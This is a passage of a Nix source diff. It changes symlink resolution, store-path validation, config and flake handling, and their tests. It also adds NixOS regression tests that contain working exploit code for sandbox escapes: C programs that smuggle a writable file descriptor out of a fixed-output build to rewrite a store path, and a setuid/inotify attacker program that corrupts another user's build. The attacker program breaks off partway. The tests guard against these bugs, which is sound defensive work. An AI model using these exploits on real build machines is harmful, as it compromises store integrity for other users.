+                throw BadStorePath("store path '%s' has invalid name '%s'", path, name);
+            if (name[2] == '-')
+                throw BadStorePath("store path '%s' has invalid name '%s': first dash-separated component must not be '%s'", path, name, "..");
+        }
+    }
     for (auto c : name)
         if (!((c >= '0' && c <= '9')
                 || (c >= 'a' && c <= 'z')

src/libutil/config-impl.hh

@@ -4,7 +4,7 @@
  *
  * Template implementations (as opposed to mere declarations).
  *
- * This file is an exmample of the "impl.hh" pattern. See the
+ * This file is an example of the "impl.hh" pattern. See the
  * contributing guide.
  *
  * One only needs to include this when one is declaring a

src/libutil/config.cc

@@ -84,7 +84,9 @@ void AbstractConfig::reapplyUnknownSettings()
 void Config::getSettings(std::map<std::string, SettingInfo> & res, bool overriddenOnly)
 {
     for (const auto & opt : _settings)
-        if (!opt.second.isAlias && (!overriddenOnly || opt.second.setting->overridden))
+        if (!opt.second.isAlias
+            && (!overriddenOnly || opt.second.setting->overridden)
+            && experimentalFeatureSettings.isEnabled(opt.second.setting->experimentalFeature))
             res.emplace(opt.first, SettingInfo{opt.second.setting->to_string(), opt.second.setting->description});
 }
 

src/libutil/file-system.cc

@@ -432,6 +432,11 @@ void deletePath(const Path & path)
     deletePath(path, dummy);
 }
 
+void createDir(const Path & path, mode_t mode)
+{
+    if (mkdir(path.c_str(), mode) == -1)
+        throw SysError("creating directory '%1%'", path);
+}
 
 Paths createDirs(const Path & path)
 {
@@ -628,6 +633,11 @@ void copy(const fs::directory_entry & from, const fs::path & to, bool andDelete)
     }
 }
 
+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete)
+{
+    return copy(fs::directory_entry(fs::path(oldPath)), fs::path(newPath), andDelete);
+}
+
 void renameFile(const Path & oldName, const Path & newName)
 {
     fs::rename(oldName, newName);

src/libutil/file-system.hh

@@ -165,6 +165,11 @@ inline Paths createDirs(PathView path)
     return createDirs(Path(path));
 }
 
+/**
+ * Create a single directory.
+ */
+void createDir(const Path & path, mode_t mode = 0755);
+
 /**
  * Create a symlink.
  */
@@ -186,6 +191,13 @@ void renameFile(const Path & src, const Path & dst);
  */
 void moveFile(const Path & src, const Path & dst);
 
+/**
+ * Recursively copy the content of `oldPath` to `newPath`. If `andDelete` is
+ * `true`, then also remove `oldPath` (making this equivalent to `moveFile`, but
+ * with the guaranty that the destination will be “fresh”, with no stale inode
+ * or file descriptor pointing to it).
+ */
+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete);
 
 /**
  * Automatic cleanup of resources.

src/libutil/source-path.cc

@@ -62,7 +62,7 @@ bool SourcePath::operator<(const SourcePath & x) const
     return std::tie(*accessor, path) < std::tie(*x.accessor, x.path);
 }
 
-SourcePath SourcePath::resolveSymlinks() const
+SourcePath SourcePath::resolveSymlinks(SymlinkResolution mode) const
 {
     auto res = SourcePath(accessor);
 
@@ -72,6 +72,8 @@ SourcePath SourcePath::resolveSymlinks() const
     for (auto & c : path)
         todo.push_back(std::string(c));
 
+    bool resolve_last = mode == SymlinkResolution::Full;
+
     while (!todo.empty()) {
         auto c = *todo.begin();
         todo.pop_front();
@@ -81,14 +83,16 @@ SourcePath SourcePath::resolveSymlinks() const
             res.path.pop();
         else {
             res.path.push(c);
-            if (auto st = res.maybeLstat(); st && st->type == InputAccessor::tSymlink) {
-                if (!linksAllowed--)
-                    throw Error("infinite symlink recursion in path '%s'", path);
-                auto target = res.readLink();
-                res.path.pop();
-                if (hasPrefix(target, "/"))
-                    res.path = CanonPath::root;
-                todo.splice(todo.begin(), tokenizeString<std::list<std::string>>(target, "/"));
+            if (resolve_last || !todo.empty()) {
+                if (auto st = res.maybeLstat(); st && st->type == InputAccessor::tSymlink) {
+                    if (!linksAllowed--)
+                        throw Error("infinite symlink recursion in path '%s'", path);
+                    auto target = res.readLink();
+                    res.path.pop();
+                    if (hasPrefix(target, "/"))
+                        res.path = CanonPath::root;
+                    todo.splice(todo.begin(), tokenizeString<std::list<std::string>>(target, "/"));
+                }
             }
         }
     }

src/libutil/source-path.hh

@@ -11,6 +11,26 @@
 
 namespace nix {
 
+/**
+ * Note there is a decent chance this type soon goes away because the problem is solved another way.
+ * See the discussion in https://github.com/NixOS/nix/pull/9985.
+ */
+enum class SymlinkResolution {
+    /**
+     * Resolve symlinks in the ancestors only.
+     *
+     * Only the last component of the result is possibly a symlink.
+     */
+    Ancestors,
+
+    /**
+     * Resolve symlinks fully, realpath(3)-style.
+     *
+     * No component of the result will be a symlink.
+     */
+    Full,
+};
+
 /**
  * An abstraction for accessing source files during
  * evaluation. Currently, it's just a wrapper around `CanonPath` that
@@ -102,11 +122,14 @@ struct SourcePath
     bool operator<(const SourcePath & x) const;
 
     /**
-     * Resolve any symlinks in this `SourcePath` (including its
-     * parents). The result is a `SourcePath` in which no element is a
-     * symlink.
+     * Resolve any symlinks in this `SourcePath` according to the
+     * given resolution mode.
+     *
+     * @param mode might only be a temporary solution for this. 
+     * See the discussion in https://github.com/NixOS/nix/pull/9985.
      */
-    SourcePath resolveSymlinks() const;
+    SourcePath resolveSymlinks(
+        SymlinkResolution mode = SymlinkResolution::Full) const;
 };
 
 std::ostream & operator << (std::ostream & str, const SourcePath & path);

src/libutil/url.cc

@@ -171,16 +171,16 @@ std::string fixGitURL(const std::string & url)
     std::regex scpRegex("([^/]*)@(.*):(.*)");
     if (!hasPrefix(url, "/") && std::regex_match(url, scpRegex))
         return std::regex_replace(url, scpRegex, "ssh://$1@$2/$3");
-    else {
-        if (url.find("://") == std::string::npos) {
-            return (ParsedURL {
-                .scheme = "file",
-                .authority = "",
-                .path = url
-            }).to_string();
-        } else
-            return url;
+    if (hasPrefix(url, "file:"))
+        return url;
+    if (url.find("://") == std::string::npos) {
+        return (ParsedURL {
+            .scheme = "file",
+            .authority = "",
+            .path = url
+        }).to_string();
     }
+    return url;
 }
 
 // https://www.rfc-editor.org/rfc/rfc3986#section-3.1

src/nix-env/nix-env.cc

@@ -108,7 +108,7 @@ static void getAllExprs(EvalState & state,
     const SourcePath & path, StringSet & seen, BindingsBuilder & attrs)
 {
     StringSet namesSorted;
-    for (auto & [name, _] : path.readDirectory()) namesSorted.insert(name);
+    for (auto & [name, _] : path.resolveSymlinks().readDirectory()) namesSorted.insert(name);
 
     for (auto & i : namesSorted) {
         /* Ignore the manifest.nix used by profiles.  This is

src/nix/flake.cc

@@ -88,17 +88,19 @@ public:
         expectArgs({
             .label="inputs",
             .optional=true,
-            .handler={[&](std::string inputToUpdate){
-                InputPath inputPath;
-                try {
-                    inputPath = flake::parseInputPath(inputToUpdate);
-                } catch (Error & e) {
-                    warn("Invalid flake input '%s'. To update a specific flake, use 'nix flake update --flake %s' instead.", inputToUpdate, inputToUpdate);
-                    throw e;
+            .handler={[&](std::vector<std::string> inputsToUpdate){
+                for (auto inputToUpdate : inputsToUpdate) {
+                    InputPath inputPath;
+                    try {
+                        inputPath = flake::parseInputPath(inputToUpdate);
+                    } catch (Error & e) {
+                        warn("Invalid flake input '%s'. To update a specific flake, use 'nix flake update --flake %s' instead.", inputToUpdate, inputToUpdate);
+                        throw e;
+                    }
+                    if (lockFlags.inputUpdates.contains(inputPath))
+                        warn("Input '%s' was specified multiple times. You may have done this by accident.");
+                    lockFlags.inputUpdates.insert(inputPath);
                 }
-                if (lockFlags.inputUpdates.contains(inputPath))
-                    warn("Input '%s' was specified multiple times. You may have done this by accident.");
-                lockFlags.inputUpdates.insert(inputPath);
             }},
             .completer = {[&](AddCompletions & completions, size_t, std::string_view prefix) {
                 completeFlakeInputPath(completions, getEvalState(), getFlakeRefsForCompletion(), prefix);

src/nix/path-info.cc

@@ -43,10 +43,16 @@ static json pathInfoToJSON(
 
     for (auto & storePath : storePaths) {
         json jsonObject;
+        auto printedStorePath = store.printStorePath(storePath);
 
         try {
             auto info = store.queryPathInfo(storePath);
 
+            // `storePath` has the representation `<hash>-x` rather than
+            // `<hash>-<name>` in case of binary-cache stores & `--all` because we don't
+            // know the name yet until we've read the NAR info.
+            printedStorePath = store.printStorePath(info->path);
+
             jsonObject = info->toJSON(store, true, HashFormat::SRI);
 
             if (showClosureSize) {
@@ -74,7 +80,7 @@ static json pathInfoToJSON(
             jsonObject = nullptr;
         }
 
-        jsonAllObjects[store.printStorePath(storePath)] = std::move(jsonObject);
+        jsonAllObjects[printedStorePath] = std::move(jsonObject);
     }
     return jsonAllObjects;
 }

tests/functional/binary-cache.sh

@@ -14,6 +14,14 @@ outPath=$(nix-build dependencies.nix --no-out-link)
 
 nix copy --to file://$cacheDir $outPath
 
+readarray -t paths < <(nix path-info --all --json --store file://$cacheDir | jq 'keys|sort|.[]' -r)
+[[ "${#paths[@]}" -eq 3 ]]
+for path in "${paths[@]}"; do
+    [[ "$path" =~ -dependencies-input-0$ ]] \
+        || [[ "$path" =~ -dependencies-input-2$ ]] \
+        || [[ "$path" =~ -dependencies-top$ ]]
+done
+
 # Test copying build logs to the binary cache.
 expect 1 nix log --store file://$cacheDir $outPath 2>&1 | grep 'is not available'
 nix store copy-log --to file://$cacheDir $outPath

tests/functional/debugger.sh

@@ -0,0 +1,13 @@
+source common.sh
+
+clearStore
+
+# regression #9932
+echo ":env" | expect 1 nix eval --debugger --expr '(_: throw "oh snap") 42'
+echo ":env" | expect 1 nix eval --debugger --expr '
+  let x.a = 1; in
+  with x;
+  (_: builtins.seq x.a (throw "oh snap")) x.a
+' >debugger-test-out
+grep -P 'with: .*a' debugger-test-out
+grep -P 'static: .*x' debugger-test-out

tests/functional/experimental-features.sh

@@ -31,17 +31,19 @@ source common.sh
 NIX_CONFIG='
   experimental-features = nix-command
   accept-flake-config = true
-' nix config show accept-flake-config 1>$TEST_ROOT/stdout 2>$TEST_ROOT/stderr
-grepQuiet "false" $TEST_ROOT/stdout
+' expect 1 nix config show accept-flake-config 1>$TEST_ROOT/stdout 2>$TEST_ROOT/stderr
+[[ $(cat $TEST_ROOT/stdout) = '' ]]
 grepQuiet "Ignoring setting 'accept-flake-config' because experimental feature 'flakes' is not enabled" $TEST_ROOT/stderr
+grepQuiet "error: could not find setting 'accept-flake-config'" $TEST_ROOT/stderr
 
 # 'flakes' experimental-feature is disabled after, ignore and warn
 NIX_CONFIG='
   accept-flake-config = true
   experimental-features = nix-command
-' nix config show accept-flake-config 1>$TEST_ROOT/stdout 2>$TEST_ROOT/stderr
-grepQuiet "false" $TEST_ROOT/stdout
+' expect 1 nix config show accept-flake-config 1>$TEST_ROOT/stdout 2>$TEST_ROOT/stderr
+[[ $(cat $TEST_ROOT/stdout) = '' ]]
 grepQuiet "Ignoring setting 'accept-flake-config' because experimental feature 'flakes' is not enabled" $TEST_ROOT/stderr
+grepQuiet "error: could not find setting 'accept-flake-config'" $TEST_ROOT/stderr
 
 # 'flakes' experimental-feature is enabled before, process
 NIX_CONFIG='

tests/functional/fetchGit.sh

@@ -30,7 +30,10 @@ echo hello >> $TEST_ROOT/worktree/hello
 rev2=$(git -C $repo rev-parse HEAD)
 git -C $repo tag -a tag2 -m tag2
 
-# Fetch a worktree
+# Check whether fetching in read-only mode works.
+nix-instantiate --eval -E "builtins.readFile ((builtins.fetchGit file://$TEST_ROOT/worktree) + \"/hello\") == \"utrecht\\n\""
+
+# Fetch a worktree.
 unset _NIX_FORCE_HTTP
 path0=$(nix eval --impure --raw --expr "(builtins.fetchGit file://$TEST_ROOT/worktree).outPath")
 path0_=$(nix eval --impure --raw --expr "(builtins.fetchTree { type = \"git\"; url = file://$TEST_ROOT/worktree; }).outPath")
@@ -268,3 +271,28 @@ git -C "$repo" add hello .gitignore
 git -C "$repo" commit -m 'Bla1'
 cd "$repo"
 path11=$(nix eval --impure --raw --expr "(builtins.fetchGit ./.).outPath")
+
+# Test a workdir with no commits.
+empty="$TEST_ROOT/empty"
+git init "$empty"
+
+emptyAttrs='{ lastModified = 0; lastModifiedDate = "19700101000000"; narHash = "sha256-pQpattmS9VmO3ZIQUFn66az8GSmB4IvYhTTCFn6SUmo="; rev = "0000000000000000000000000000000000000000"; revCount = 0; shortRev = "0000000"; submodules = false; }'
+
+[[ $(nix eval --impure --expr "builtins.removeAttrs (builtins.fetchGit $empty) [\"outPath\"]") = $emptyAttrs ]]
+
+echo foo > "$empty/x"
+
+[[ $(nix eval --impure --expr "builtins.removeAttrs (builtins.fetchGit $empty) [\"outPath\"]") = $emptyAttrs ]]
+
+git -C "$empty" add x
+
+[[ $(nix eval --impure --expr "builtins.removeAttrs (builtins.fetchGit $empty) [\"outPath\"]") = '{ lastModified = 0; lastModifiedDate = "19700101000000"; narHash = "sha256-wzlAGjxKxpaWdqVhlq55q5Gxo4Bf860+kLeEa/v02As="; rev = "0000000000000000000000000000000000000000"; revCount = 0; shortRev = "0000000"; submodules = false; }' ]]
+
+# Test a repo with an empty commit.
+git -C "$empty" rm -f x
+
+git -C "$empty" config user.email "foobar@example.com"
+git -C "$empty" config user.name "Foobar"
+git -C "$empty" commit --allow-empty --allow-empty-message --message ""
+
+nix eval --impure --expr "let attrs = builtins.fetchGit $empty; in assert attrs.lastModified != 0; assert attrs.rev != \"0000000000000000000000000000000000000000\"; assert attrs.revCount == 1; true"

tests/functional/fetchGitSubmodules.sh

@@ -170,3 +170,45 @@ pathWithSubmodules=$(nix eval --impure --raw --expr "(builtins.fetchGit { url =
 
 [[ -e $pathWithoutExportIgnore/exclude-from-root ]]
 [[ -e $pathWithoutExportIgnore/sub/exclude-from-sub ]]
+
+test_submodule_nested() {
+  local repoA=$TEST_ROOT/submodule_nested/a
+  local repoB=$TEST_ROOT/submodule_nested/b
+  local repoC=$TEST_ROOT/submodule_nested/c
+
+  rm -rf $repoA $repoB $repoC $TEST_HOME/.cache/nix
+
+  initGitRepo $repoC
+  touch $repoC/inside-c
+  git -C $repoC add inside-c
+  addGitContent $repoC
+
+  initGitRepo $repoB
+  git -C $repoB submodule add $repoC c
+  git -C $repoB add c
+  addGitContent $repoB
+
+  initGitRepo $repoA
+  git -C $repoA submodule add $repoB b
+  git -C $repoA add b
+  addGitContent $repoA
+
+
+  # Check non-worktree fetch
+  local rev=$(git -C $repoA rev-parse HEAD)
+  out=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = \"file://$repoA\"; rev = \"$rev\"; submodules = true; }).outPath")
+  test -e $out/b/c/inside-c
+  test -e $out/content
+  test -e $out/b/content
+  test -e $out/b/c/content
+  local nonWorktree=$out
+
+  # Check worktree based fetch
+  # TODO: make it work without git submodule update
+  git -C $repoA submodule update --init --recursive
+  out=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = \"file://$repoA\"; submodules = true; }).outPath")
+  find $out
+  [[ $out == $nonWorktree ]] || { find $out; false; }
+
+}
+test_submodule_nested

tests/functional/fetchurl.sh

@@ -78,3 +78,9 @@ outPath=$(nix-build -vvvvv --expr 'import <nix/fetchurl.nix>' --argstr url file:
 
 test -x $outPath/fetchurl.sh
 test -L $outPath/symlink
+
+# Make sure that *not* passing a outputHash fails.
+requireDaemonNewerThan "2.20"
+expected=100
+if [[ -v NIX_DAEMON_PACKAGE ]]; then expected=1; fi # work around the daemon not returning a 100 status correctly
+expectStderr $expected nix-build --expr '{ url }: builtins.derivation { name = "nix-cache-info"; system = "x86_64-linux"; builder = "builtin:fetchurl"; inherit url; outputHashMode = "flat"; }' --argstr url file://$narxz 2>&1 | grep 'must be a fixed-output or impure derivation'

tests/functional/flakes/flakes.sh

@@ -564,6 +564,16 @@ nix flake lock "$flake3Dir"
 nix flake update flake2/flake1 --flake "$flake3Dir"
 [[ $(jq -r .nodes.flake1_2.locked.rev "$flake3Dir/flake.lock") =~ $hash2 ]]
 
+# Test updating multiple inputs.
+nix flake lock "$flake3Dir" --override-input flake1 flake1/master/$hash1
+nix flake lock "$flake3Dir" --override-input flake2/flake1 flake1/master/$hash1
+[[ $(jq -r .nodes.flake1.locked.rev "$flake3Dir/flake.lock") =~ $hash1 ]]
+[[ $(jq -r .nodes.flake1_2.locked.rev "$flake3Dir/flake.lock") =~ $hash1 ]]
+
+nix flake update flake1 flake2/flake1 --flake "$flake3Dir"
+[[ $(jq -r .nodes.flake1.locked.rev "$flake3Dir/flake.lock") =~ $hash2 ]]
+[[ $(jq -r .nodes.flake1_2.locked.rev "$flake3Dir/flake.lock") =~ $hash2 ]]
+
 # Test 'nix flake metadata --json'.
 nix flake metadata "$flake3Dir" --json | jq .
 

tests/functional/impure-derivations.sh

@@ -63,3 +63,7 @@ path5=$(nix build -L --no-link --json --file ./impure-derivations.nix contentAdd
 path6=$(nix build -L --no-link --json --file ./impure-derivations.nix inputAddressedAfterCA | jq -r .[].outputs.out)
 [[ $(< $path6) = X ]]
 [[ $(< $TEST_ROOT/counter) = 5 ]]
+
+# Test nix/fetchurl.nix.
+path7=$(nix build -L --no-link --print-out-paths --expr "import <nix/fetchurl.nix> { impure = true; url = file://$PWD/impure-derivations.sh; }")
+cmp $path7 $PWD/impure-derivations.sh

tests/functional/lang/eval-okay-pathexists.nix

@@ -29,3 +29,6 @@ builtins.pathExists (./lib.nix)
 && builtins.pathExists (builtins.toPath { outPath = builtins.toString ./lib.nix; })
 && builtins.pathExists ./lib.nix
 && !builtins.pathExists ./bla.nix
+&& builtins.pathExists ./symlink-resolution/foo/overlays/overlay.nix
+&& builtins.pathExists ./symlink-resolution/broken
+&& builtins.pathExists (builtins.toString ./symlink-resolution/foo/overlays + "/.")

tests/functional/lang/symlink-resolution/broken

@@ -0,0 +1 @@
+nonexistent

tests/functional/linux-sandbox.sh

@@ -73,3 +73,6 @@ testCert missing fixed-output "$nocert"
 
 # Cert in sandbox when ssl-cert-file is set to an existing file
 testCert present fixed-output "$cert"
+
+# Symlinks should be added in the sandbox directly and not followed
+nix-sandbox-build symlink-derivation.nix

tests/functional/local.mk

@@ -127,7 +127,8 @@ nix_tests = \
   toString-path.sh \
   read-only-store.sh \
   nested-sandboxing.sh \
-  impure-env.sh
+  impure-env.sh \
+  debugger.sh
 
 ifeq ($(HAVE_LIBCPUID), 1)
   nix_tests += compute-levels.sh

tests/functional/nix-channel.sh

@@ -29,7 +29,8 @@ unset NIX_CONFIG
 # Create a channel.
 rm -rf $TEST_ROOT/foo
 mkdir -p $TEST_ROOT/foo
-nix copy --to file://$TEST_ROOT/foo?compression="bzip2" $(nix-store -r $(nix-instantiate dependencies.nix))
+drvPath=$(nix-instantiate dependencies.nix)
+nix copy --to file://$TEST_ROOT/foo?compression="bzip2" $(nix-store -r "$drvPath")
 rm -rf $TEST_ROOT/nixexprs
 mkdir -p $TEST_ROOT/nixexprs
 cp config.nix dependencies.nix dependencies.builder*.sh $TEST_ROOT/nixexprs/
@@ -64,3 +65,5 @@ grepQuiet 'item.*attrPath="foo".*name="dependencies-top"' $TEST_ROOT/meta.xml
 nix-env -i dependencies-top
 [ -e $TEST_HOME/.nix-profile/foobar ]
 
+# Test evaluation through a channel symlink (#9882).
+nix-instantiate '<foo/dependencies.nix>'

tests/functional/symlink-derivation.nix

@@ -0,0 +1,36 @@
+with import ./config.nix;
+
+let
+  foo_in_store = builtins.toFile "foo" "foo";
+  foo_symlink = mkDerivation {
+    name = "foo-symlink";
+    buildCommand = ''
+      ln -s ${foo_in_store} $out
+    '';
+  };
+  symlink_to_not_in_store = mkDerivation {
+    name = "symlink-to-not-in-store";
+    buildCommand = ''
+      ln -s ${builtins.toString ./.} $out
+    '';
+  };
+in
+mkDerivation {
+  name = "depends-on-symlink";
+  buildCommand = ''
+    (
+      set -x
+
+      # `foo_symlink` should be a symlink pointing to `foo_in_store`
+      [[ -L ${foo_symlink} ]]
+      [[ $(readlink ${foo_symlink}) == ${foo_in_store} ]]
+
+      # `symlink_to_not_in_store` should be a symlink pointing to `./.`, which
+      # is not available in the sandbox
+      [[ -L ${symlink_to_not_in_store} ]]
+      [[ $(readlink ${symlink_to_not_in_store}) == ${builtins.toString ./.} ]]
+      (! ls ${symlink_to_not_in_store}/)
+    )
+    echo "Success!" > $out
+  '';
+}

tests/functional/user-envs.sh

@@ -189,3 +189,9 @@ nix-env --set $outPath10
 [ "$(nix-store -q --resolve $profiles/test)" = $outPath10 ]
 nix-env --set $drvPath10
 [ "$(nix-store -q --resolve $profiles/test)" = $outPath10 ]
+
+# Test the case where $HOME contains a symlink.
+mkdir -p $TEST_ROOT/real-home/alice/.nix-defexpr/channels
+ln -sfn $TEST_ROOT/real-home $TEST_ROOT/home
+ln -sfn $(pwd)/user-envs.nix $TEST_ROOT/home/alice/.nix-defexpr/channels/foo
+HOME=$TEST_ROOT/home/alice nix-env -i foo-0.1

tests/nixos/ca-fd-leak/default.nix

@@ -0,0 +1,90 @@
+# Nix is a sandboxed build system. But Not everything can be handled inside its
+# sandbox: Network access is normally blocked off, but to download sources, a
+# trapdoor has to exist. Nix handles this by having "Fixed-output derivations".
+# The detail here is not important, but in our case it means that the hash of
+# the output has to be known beforehand. And if you know that, you get a few
+# rights: you no longer run inside a special network namespace!
+#
+# Now, Linux has a special feature, that not many other unices do: Abstract
+# unix domain sockets! Not only that, but those are namespaced using the
+# network namespace! That means that we have a way to create sockets that are
+# available in every single fixed-output derivation, and also all processes
+# running on the host machine! Now, this wouldn't be that much of an issue, as,
+# well, the whole idea is that the output is pure, and all processes in the
+# sandbox are killed before finalizing the output. What if we didn't need those
+# processes at all? Unix domain sockets have a semi-known trick: you can pass
+# file descriptors around!
+# This makes it possible to exfiltrate a file-descriptor with write access to
+# $out outside of the sandbox. And that file-descriptor can be used to modify
+# the contents of the store path after it has been registered.
+
+{ config, ... }:
+
+let
+  pkgs = config.nodes.machine.nixpkgs.pkgs;
+
+  # Simple C program that sends a a file descriptor to `$out` to a Unix
+  # domain socket.
+  # Compiled statically so that we can easily send it to the VM and use it
+  # inside the build sandbox.
+  sender = pkgs.runCommandWith {
+    name = "sender";
+    stdenv = pkgs.pkgsStatic.stdenv;
+  } ''
+    $CC -static -o $out ${./sender.c}
+  '';
+
+  # Okay, so we have a file descriptor shipped out of the FOD now. But the
+  # Nix store is read-only, right? .. Well, yeah. But this file descriptor
+  # lives in a mount namespace where it is not! So even when this file exists
+  # in the actual Nix store, we're capable of just modifying its contents...
+  smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c);
+
+  # The abstract socket path used to exfiltrate the file descriptor
+  socketName = "FODSandboxExfiltrationSocket";
+in
+{
+  name = "ca-fd-leak";
+
+  nodes.machine =
+    { config, lib, pkgs, ... }:
+    { virtualisation.writableStore = true;
+      nix.settings.substituters = lib.mkForce [ ];
+      virtualisation.additionalPaths = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ];
+    };
+
+  testScript = { nodes }: ''
+    start_all()
+
+    machine.succeed("echo hello")
+    # Start the smuggler server
+    machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &")
+
+    # Build the smuggled derivation.
+    # This will connect to the smuggler server and send it the file descriptor
+    machine.succeed(r"""
+      nix-build -E '
+        builtins.derivation {
+          name = "smuggled";
+          system = builtins.currentSystem;
+          # look ma, no tricks!
+          outputHashMode = "flat";
+          outputHashAlgo = "sha256";
+          outputHash = builtins.hashString "sha256" "hello, world\n";
+          builder = "${pkgs.busybox-sandbox-shell}/bin/sh";
+          args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ];
+      }'
+    """.strip())
+
+
+    # Tell the smuggler server that we're done
+    machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
+
+    # Check that the file was not modified
+    machine.succeed(r"""
+      cat ./result
+      test "$(cat ./result)" = "hello, world"
+    """.strip())
+  '';
+
+}

tests/nixos/ca-fd-leak/sender.c

@@ -0,0 +1,65 @@
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <stdlib.h>
+#include <stddef.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <string.h>
+#include <assert.h>
+
+int main(int argc, char **argv) {
+
+    assert(argc == 2);
+
+    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
+
+    // Set up a abstract domain socket path to connect to.
+    struct sockaddr_un data;
+    data.sun_family = AF_UNIX;
+    data.sun_path[0] = 0;
+    strcpy(data.sun_path + 1, argv[1]);
+
+    // Now try to connect, To ensure we work no matter what order we are
+    // executed in, just busyloop here.
+    int res = -1;
+    while (res < 0) {
+        res = connect(sock, (const struct sockaddr *)&data,
+            offsetof(struct sockaddr_un, sun_path)
+              + strlen(argv[1])
+              + 1);
+        if (res < 0 && errno != ECONNREFUSED) perror("connect");
+        if (errno != ECONNREFUSED) break;
+    }
+
+    // Write our message header.
+    struct msghdr msg = {0};
+    msg.msg_control = malloc(128);
+    msg.msg_controllen = 128;
+
+    // Write an SCM_RIGHTS message containing the output path.
+    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
+    hdr->cmsg_len = CMSG_LEN(sizeof(int));
+    hdr->cmsg_level = SOL_SOCKET;
+    hdr->cmsg_type = SCM_RIGHTS;
+    int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640);
+    memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));
+
+    msg.msg_controllen = CMSG_SPACE(sizeof(int));
+
+    // Write a single null byte too.
+    msg.msg_iov = malloc(sizeof(struct iovec));
+    msg.msg_iov[0].iov_base = "";
+    msg.msg_iov[0].iov_len = 1;
+    msg.msg_iovlen = 1;
+
+    // Send it to the othher side of this connection.
+    res = sendmsg(sock, &msg, 0);
+    if (res < 0) perror("sendmsg");
+    int buf;
+
+    // Wait for the server to close the socket, implying that it has
+    // received the commmand.
+    recv(sock, (void *)&buf, sizeof(int), 0);
+}

tests/nixos/ca-fd-leak/smuggler.c

@@ -0,0 +1,66 @@
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <stdlib.h>
+#include <stddef.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <assert.h>
+
+int main(int argc, char **argv) {
+
+    assert(argc == 2);
+
+    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
+
+    // Bind to the socket.
+    struct sockaddr_un data;
+    data.sun_family = AF_UNIX;
+    data.sun_path[0] = 0;
+    strcpy(data.sun_path + 1, argv[1]);
+    int res = bind(sock, (const struct sockaddr *)&data,
+        offsetof(struct sockaddr_un, sun_path)
+        + strlen(argv[1])
+        + 1);
+    if (res < 0) perror("bind");
+
+    res = listen(sock, 1);
+    if (res < 0) perror("listen");
+
+    int smuggling_fd = -1;
+
+    // Accept the connection a first time to receive the file descriptor.
+    fprintf(stderr, "%s\n", "Waiting for the first connection");
+    int a = accept(sock, 0, 0);
+    if (a < 0) perror("accept");
+
+    struct msghdr msg = {0};
+    msg.msg_control = malloc(128);
+    msg.msg_controllen = 128;
+
+    // Receive the file descriptor as sent by the smuggler.
+    recvmsg(a, &msg, 0);
+
+    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
+    while (hdr) {
+        if (hdr->cmsg_level == SOL_SOCKET
+          && hdr->cmsg_type == SCM_RIGHTS) {
+
+            // Grab the copy of the file descriptor.
+            memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int));
+        }
+
+        hdr = CMSG_NXTHDR(&msg, hdr);
+    }
+    fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection");
+    close(a);
+
+    // Wait for a second connection, which will tell us that the build is
+    // done
+    a = accept(sock, 0, 0);
+    fprintf(stderr, "%s\n", "Got a second connection, rewriting the file");
+    // Write a new content to the file
+    if (ftruncate(smuggling_fd, 0)) perror("ftruncate");
+    char * new_content = "Pwned\n";
+    int written_bytes = write(smuggling_fd, new_content, strlen(new_content));
+    if (written_bytes != strlen(new_content)) perror("write");
+}

tests/nixos/default.nix

@@ -109,7 +109,7 @@ in
       nix.package = lib.mkForce pkgs.nixVersions.nix_2_13;
     };
   };
-  
+
   # TODO: (nixpkgs update) remoteBuildsSshNg_remote_2_18 = ...
 
   # Test our Nix as a builder for clients that are older
@@ -156,4 +156,8 @@ in
     (system: runNixOSTestFor system ./setuid.nix);
 
   fetch-git = runNixOSTestFor "x86_64-linux" ./fetch-git;
+
+  ca-fd-leak = runNixOSTestFor "x86_64-linux" ./ca-fd-leak;
+
+  user-sandboxing = runNixOSTestFor "x86_64-linux" ./user-sandboxing;
 }

tests/nixos/user-sandboxing/attacker.c

@@ -0,0 +1,82 @@
+#define _GNU_SOURCE
+
+#include <fcntl.h>
+#include <stdio.h>
+#include <sys/inotify.h>
+#include <sys/stat.h>
+#include <unistd.h>
+#include <stdlib.h>
+
+#define SYS_fchmodat2 452
+
+int fchmodat2(int dirfd, const char *pathname, mode_t mode, int flags) {
+  return syscall(SYS_fchmodat2, dirfd, pathname, mode, flags);
+}
+
+int main(int argc, char **argv) {
+  if (argc <= 1) {
+    // stage 1: place the setuid-builder executable
+
+    // make the build directory world-accessible first
+    chmod(".", 0755);
+
+    if (fchmodat2(AT_FDCWD, "attacker", 06755, AT_SYMLINK_NOFOLLOW) < 0) {
+      perror("Setting the suid bit on attacker");
+      exit(-1);
+    }
+
+  } else {
+    // stage 2: corrupt the victim derivation while it's building
+
+    // prevent the kill
+    if (setresuid(-1, -1, getuid())) {
+      perror("setresuid");
+      exit(-1);
+    }
+
+    if (fork() == 0) {
+
+      // wait for the victim to build
+      int fd = inotify_init();
+      inotify_add_watch(fd, argv[1], IN_CREATE);
+      int dirfd = open(argv[1], O_DIRECTORY);
+      if (dirfd < 0) {
+        perror("opening the global build directory");
+        exit(-1);
+      }
+      char buf[4096];
+      fprintf(stderr, "Entering the inotify loop\n");
+      for (;;) {
+        ssize_t len = read(fd, buf, sizeof(buf));
+        struct inotify_event *ev;
+        for (char *pe = buf; pe < buf + len;
+            pe += sizeof(struct inotify_event) + ev->len) {
+          ev = (struct inotify_event *)pe;
+          fprintf(stderr, "folder %s created\n", ev->name);
+          // wait a bit to prevent racing against the creation
